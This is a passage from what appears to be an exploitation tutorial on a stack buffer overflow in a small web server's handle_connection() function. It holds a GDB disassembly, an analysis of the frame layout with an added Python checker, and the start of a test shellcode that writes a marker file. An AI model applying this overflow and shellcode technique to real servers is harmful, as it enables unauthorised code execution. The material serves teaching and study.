0x08049307 <handle_connection+846>: mov DWORD PTR [esp+4],0x2
0x0804930f <handle_connection+854>: mov eax,DWORD PTR [ebp+8]
0x08049312 <handle_connection+857>: mov DWORD PTR [esp],eax
0x08049315 <handle_connection+860>: call 0x8048800 <shutdown@plt>
0x0804931a <handle_connection+865>: add esp,0x644
0x08049320 <handle_connection+871>: pop ebx
0x08049321 <handle_connection+872>: pop ebp
0x08049322 <handle_connection+873>: ret
End of assembler dump.
(gdb)
At the beginning of the function, the function prologue saves the current values of the EBP and EBX registers by pushing them to the stack, and sets EBP to the current value of ESP so it can be used as a point of reference for accessing stack variables. Finally, 0x644 bytes are reserved on the stack for these stack variables by subtracting from ESP. The function epilogue at the end restores ESP by adding 0x644 back to it and restores the saved values of EBX and EBP by popping them from the stack back into the registers.
The overwrite instructions are actually found in the recv_line() function; however, they write to data in the handle_connection() stack frame, so the overwrite itself happens in handle_connection(). The return address that we overwrite is pushed to the stack when handle_connection() is called, so the saved values for EBP and EBX pushed to the stack in the function prologue will be between the return address and the corruptible buffer. This means that EBP and EBX will get mangled when the function epilogue executes.
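The frame layout argued in the two paragraphs above can be checked mechanically from the GDB output. The following is an added example (not code from the book or from tinyweb) that parses GDB "disassemble" lines in the format shown above, walks the prologue to work out where the return address, saved EBP and saved EBX sit relative to EBP, lists which saved slots lie between the local buffer area and the return address, and cross-checks that the epilogue undoes the prologue in reverse order. The epilogue lines are the four from the dump above; the prologue lines are constructed to match the text's description (push EBP, set EBP to ESP, push EBX, subtract 0x644 from ESP), with placeholder addresses that are not from the page.

```python
import re

# Constructed prologue, written to match the text's description of
# handle_connection(); the addresses are placeholders, not from the page.
PROLOGUE = """\
0x00000000 <handle_connection+0>: push ebp
0x00000001 <handle_connection+1>: mov ebp,esp
0x00000003 <handle_connection+3>: push ebx
0x00000004 <handle_connection+4>: sub esp,0x644
"""

# The epilogue exactly as the GDB dump above shows it.
EPILOGUE = """\
0x0804931a <handle_connection+865>: add esp,0x644
0x08049320 <handle_connection+871>: pop ebx
0x08049321 <handle_connection+872>: pop ebp
0x08049322 <handle_connection+873>: ret
"""

# One GDB disassembly line: address, <symbol+offset>:, mnemonic, operands.
LINE_RE = re.compile(r"^0x[0-9a-f]+\s+<[^>]+>:\s+(\S+)\s*(.*)$")


def parse_gdb(text):
    """Return (mnemonic, operands) pairs for every GDB disassembly line."""
    insns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            insns.append((m.group(1), m.group(2).strip()))
    return insns


def frame_layout(prologue_text):
    """Simulate the prologue and return (layout, locals_size).

    Offsets are in bytes relative to EBP once the frame is set up; the
    return address slot (ESP at function entry) is the reference point.
    """
    esp = 0            # ESP relative to the return address slot
    ebp = None
    saved = {}         # register name -> slot offset from the return address
    locals_size = 0
    for mnem, ops in parse_gdb(prologue_text):
        if mnem == "push":
            esp -= 4
            saved[ops] = esp
        elif mnem == "mov" and ops == "ebp,esp":
            ebp = esp
        elif mnem == "sub":
            dst, imm = ops.split(",")
            if dst == "esp":
                locals_size = int(imm, 16)
                esp -= locals_size
    if ebp is None:
        raise ValueError("no frame pointer setup found in prologue")
    layout = {"return address": 0 - ebp}
    for reg, off in saved.items():
        layout["saved " + reg] = off - ebp
    layout["locals bottom"] = esp - ebp   # lowest address of the local area
    return layout, locals_size


def fields_between_locals_and_return(layout):
    """Saved slots that sit above the local area but below the return address,
    lowest address first: a write running upward out of the locals passes
    through these before it reaches the return address."""
    locals_top = min(off for name, off in layout.items() if name.startswith("saved "))
    return [name for off, name in sorted((o, n) for n, o in layout.items())
            if name.startswith("saved ") and locals_top <= off < layout["return address"]]


def check_epilogue(layout, locals_size, epilogue_text):
    """True if the epilogue frees the locals and pops the saved registers
    in address order (lowest first), then returns."""
    expected = [("add", "esp,0x%x" % locals_size)]
    restored = sorted((off, name) for name, off in layout.items() if name.startswith("saved "))
    for _, name in restored:
        expected.append(("pop", name.split()[1]))
    expected.append(("ret", ""))
    return parse_gdb(epilogue_text) == expected


if __name__ == "__main__":
    layout, size = frame_layout(PROLOGUE)
    for name, off in sorted(layout.items(), key=lambda kv: kv[1]):
        print("%-16s EBP%+d" % (name, off))
    print("between locals and return address:", fields_between_locals_and_return(layout))
    print("epilogue mirrors prologue:", check_epilogue(layout, size, EPILOGUE))
```

Running it prints the frame from the bottom of the 0x644-byte local area (EBP-0x648) up through saved EBX (EBP-4), saved EBP (EBP+0) and the return address (EBP+4), and reports that both saved registers lie between the locals and the return address, which is exactly why the epilogue's two pops load corrupted values after the overwrite.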
Since we don't gain control of the program's execution until the return instruction, all the instructions between the overwrite and the return instruction must be executed. First, we need to assess how much collateral damage is done by these extra instructions after the overwrite. The assembly instruction int3 creates the byte 0xcc, which is literally a debugging breakpoint. The shellcode below uses an int3 instruction instead of exiting. This breakpoint will be caught by GDB, allowing us to examine the exact state of the program after the shellcode executes.
mark_break.s
BITS 32
; Mark the filesystem to prove you ran.
jmp short one
two:
pop ebx ; Filename
xor ecx, ecx
mov BYTE [ebx+7], cl ; Null terminate filename
push BYTE 0x5 ; Open()
pop eax
mov WORD cx, 0x441 ; O_WRONLY|O_APPEND|O_CREAT
xor edx, edx
mov WORD dx, 0x180 ; S_IRUSR|S_IWUSR
int 0x80 ; Open file to create it.
; eax = returned file descriptor
mov ebx, eax ; File descriptor to second arg